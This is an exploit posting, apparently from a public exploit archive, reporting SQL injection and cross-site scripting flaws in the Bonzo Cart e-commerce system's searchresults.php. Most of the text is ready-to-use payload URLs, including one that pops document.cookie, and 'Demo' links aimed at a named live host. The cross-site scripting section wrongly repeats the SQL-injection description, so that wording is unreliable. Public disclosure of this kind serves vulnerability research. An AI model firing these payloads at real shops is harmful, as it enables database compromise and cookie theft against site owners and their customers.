==============================
# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Example
searchresults.php?ord1=<SQL Injection  
Code>&ord2=asc&search1=&SearchTerm=&where=ItemName

Exploit:
searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName

Demo:
http://demo.turnkeycentral.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName

==============================
# Exploit Title: Bonzo Cart (E-Commerce System) Cross Site Scripting
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Example
/searchresults.php?SearchTerm=<XSS  
Code>&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14

Exploit:
/searchresults.php?SearchTerm="%2F><%2Fa><%2F><img+src%3D1.gif+onerror%3Dalert(document.cookie)>&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14

Demo:
http://demo.turnkeycentral.com/bonzacart/searchresults.php?SearchTerm=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14